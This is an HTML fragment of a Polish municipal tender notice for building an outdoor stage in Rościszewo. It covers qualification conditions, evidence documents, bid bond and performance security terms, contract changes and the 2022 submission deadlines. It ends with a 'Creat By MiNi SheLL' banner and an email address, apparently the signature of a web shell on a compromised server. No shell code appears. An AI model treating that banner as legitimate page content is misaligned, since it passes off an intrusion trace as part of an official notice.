p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1.1.	nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 1) i 4) ustawy Pzp; <br/>1.2.	spełniają warunki dotyczące: <br/>1.2.1.	zdolności do występowania w obrocie gospodarczym; <br/>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>1.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>1.2.3.	sytuacji ekonomicznej lub finansowej; <br/>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>1.2.4.	zdolności technicznej lub zawodowej. <br/>1.2.4.1.	Wykonawca spełni warunek jeżeli wykaże że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał: roboty budowlane odpowiadających swoim zakresem przedmiotowi zamówienia (roboty w zakresie wznoszenia budynków i obiektów budowlanych) - zrealizował, co najmniej jedną robotę o wartości nie mniejszej niż 150.000 zł wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których roboty zostały wykonane z załączeniem dowodów określających, czy te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyny niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>1.2.4.2.	Wykonawca spełni warunek jeżeli wykaże że dysponuje osobami które będą odpowiedzialne za kierowanie robotami budowlanymi posiadającymi kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami. W szczególności wykonawca musi dysponować: <br/>Kierownika budowy – z uprawnieniami do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej*.<br/>Kierownika budowy - z uprawnieniami do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń energetycznych* <br/>*Zamawiający dopuszcza uprawnienia budowlane odpowiadające w/w uprawnieniom, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/>* Samodzielne funkcje techniczne w budownictwie, określone w art. 12a ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych tj. m.in. w ustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej z dnia 22 grudnia 2015 r (Dz. U. 2018 poz. 2272) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, wykonawca zobowiązany jest do złożenia wraz z ofertą oświadczenia o niepodleganiu wykluczeniu z postepowania w zakresie art. 108 ust. 1 pkt 1-6 i art. 109 ust. 1 pkt 1 i 4 ustawy Pzp - wzór oświadczenia stanowi załącznik Nr 3 do SWZ. <br/>1.1.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w ust. 1, składa każdy z Wykonawców. Oświadczenie to ma potwierdzać brak podstaw wykluczenia z postępowania. <br/>1.2.	Oświadczenie o którym mowa w ust. 1, stanowi dowód potwierdzający brak podstaw wykluczenia z postępowania na dzień składania ofert i stanowi dowód tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe. <br/>1.3.	W przypadku polegania na zdolnościach lub sytuacji podmiotów udostepniających zasoby Wykonawca, przedstawia wraz z oświadczeniem o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu. <br/>2.	Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie wezwany przez zamawiającego, do złożenia w terminie nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych aktualnych na dzień ich złożenia: <br/>2.1. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonego nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. <br/>2.2.	Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>2.3. Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywna- mi lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>2.4. Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej; – zgodnie z załącznikiem Nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	W celu potwierdzenia spełniania warunków udziału w postepowaniu o udzielenie zamówienia publicznego, wykonawca zobowiązany jest do złożenia wraz z ofertą oświadczenia o spełnianiu warunków udziału w postepowaniu - wzór oświadczenia stanowi załącznik Nr 2 do SWZ. <br/>1.1.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w ust. 1, składa każdy z Wykonawców. Oświadczenie to ma potwierdzać spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>1.2.	Oświadczenie o którym mowa w ust. 1, stanowi dowód potwierdzający spełnianie warunków udziału w postepowaniu na dzień składania ofert i stanowi dowód tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe. <br/>1.3.	W przypadku polegania na zdolnościach lub sytuacji podmiotów udostepniających zasoby Wykonawca, przedstawia, wraz z oświadczeniem o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające spełnianie warunku udziału w postepowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. <br/>2.	Wykonawca którego oferta zostanie najwyżej oceniona, zostanie wezwany przez zamawiającego, do złożenia w terminie nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych aktualnych na dzień ich złożenia w postaci: <br/>2.1.	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty, (Wykonawca wykaże że wykonał roboty budowlane odpowiadających swoim zakresem przedmiotowi zamówienia (roboty budowlane w zakresie wznoszenia budynków lub obiektów budowlanych) - zrealizował, co najmniej jedną robotę o wartości nie mniejszej niż 150.000 zł) – załącznik nr 5 SWZ<br/>2.2.	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; (W szczególności wykonawca musi dysponować: <br/>Kierownika budowy – z uprawnieniami do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej.<br/>Kierownika budowy - z uprawnieniami do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń energetycznych – załącznik nr 6 SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych w przedmiotowym postepowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta musi zawierać:<br/>1.1. wypełniony formularz ofertowy – według załącznika nr 1 do SWZ;<br/>1.2. kosztorys ofertowy<br/>1.3. oświadczenie o niepodleganiu wykluczenia – według załącznika nr 2 do SWZ;<br/>1.4. oświadczenie o spełnianiu warunków udziału w postepowaniu – według zał. nr 3 do SWZ;<br/>1.5. zobowiązanie podmiotu (jeżeli dotyczy) – według załącznika nr 8;<br/>1.6. pełnomocnictwo – jeśli jest wymagane;<br/>1.7. potwierdzenie wniesienia wadium (oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający określa kwotę wadium w wysokości 5000,00 zł (słownie: pięć tysięcy złotych).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. Ustawy Pzp.<br/>3.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>4.1.	pieniądzu;<br/>4.2.	gwarancjach bankowych;<br/>4.3.	gwarancjach ubezpieczeniowych;<br/>4.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego– Urząd Gminy Rościszewo, Bank Spółdzielczy w Starej Białej, Odział Sierpc, Filia Rościszewo Nr 07 9015 0001 2600 0101 2000 0020.<br/>6.	W przypadku wadium wniesionego w pieniądzu oraz z treści gwarancji i poręczeń, jeżeli wadium będzie wniesione w tych formach, musi wynikać, że wadium zabezpiecza ofertę wykonawcy złożoną w postępowaniu o udzielenie zamówienia publicznego - oznaczenie sprawy: RRGKB.271.9.2022 „Budowa sceny plenerowej w miejscowości Rościszewo”.<br/>7.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>8.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 4.2-4.4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>Szczegółowe informacje dotyczące warium zawiera rozdział XXVII SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawca, którego oferta została wybrana zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy (zwane dalej „zabezpieczenie”) w wysokości 5% ceny całkowitej brutto wskazanej w ofercie.<br/>2.	Zabezpieczenie wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego– Urząd Gminy Rościszewo, Bank Spółdzielczy w Starej Białej, Odział Sierpc, Filia Rościszewo Nr 07 9015 0001 2600 0101 2000 0020.<br/>3.	W przypadku zabezpieczenia wniesionego w pieniądzu oraz z treści gwarancji i poręczeń, jeżeli zabezpieczenie będzie wniesione w tych formach, musi być zawarte oznaczenie i nazwa postępowania - oznaczenie sprawy: RRGKB.271.9.2022 „Budowa sceny plenerowej w miejscowości Rościszewo”<br/>4.	Ilekroć w niniejszym rozdziale mowa jest o zabezpieczeniu, należy przez to rozumieć zabezpieczenie należytego wykonania umowy.<br/>5.	Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.<br/>6.	Zabezpieczenie wnosi się przed zawarciem umowy, chyba że ustawa stanowi inaczej lub zamawiający określi inny termin w dokumentach zamówienia.<br/>7.	Zabezpieczenie może być wnoszone, według wyboru wykonawcy, w jednej lub w kilku następujących formach:<br/>7.1.	pieniądzu;<br/>7.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>7.3.	gwarancjach bankowych;<br/>7.4.	gwarancjach ubezpieczeniowych;<br/>7.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>8.	Za zgodą zamawiającego zabezpieczenie może być wnoszone również:<br/>8.1.	w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo-kredytowej;<br/>8.2.	przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu terytorialnego;<br/>8.3.	przez ustanowienie zastawu rejestrowego na zasadach określonych w ustawie z dnia 6 grudnia 1996 r. o zastawie rejestrowym i rejestrze zastawów.<br/>9.	Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy wskazany przez zamawiającego.<br/>10.	W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.<br/><br/>UWAGA: Zamawiający przewiduje, że strony w umowie określą okres rękojmi za wady fizyczne równy okresowi udzielonej gwarancji. W przypadku zabezpieczenia należytego wykonania umowy, kwota 30% zabezpieczenia zostanie zatrzymana na okres udzielonej gwarancji równej okresowi rękojmi za wady fizyczne. <br/><br/>Szczegóły dotyczące zabezpieczenia należytego wykonania umowy zawiera rozdział XXVIII SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp. <br/>2.	Niedopuszczalne są istotne zmiany postanowień umowy w stosunku do treści oferty, chyba, że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub Specyfikacji Istotnych Warunków Zamówienia oraz określił warunki takiej zmiany.<br/>3.	Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.<br/>4.	Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia określonego w § 6 ust. 1 Umowy w następujących przypadkach: <br/>4.1.	w przypadku zmiany stawki podatku od towarów i usług,<br/>4.2.	w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3 – 5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>4.3.	w przypadku zmian zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub zmiany wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, <br/>jeżeli zmiany określone w podp. 1), 2) i 3) będą miały wpływ na koszty wykonania Umowy przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę drogą elektroniczną w rozumieniu przepisów ustawy Pzp i wprowadza ją do oprogramowania JOSEPHINE, które znajduje się pod adresem: https://josephine.proebiz.com</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com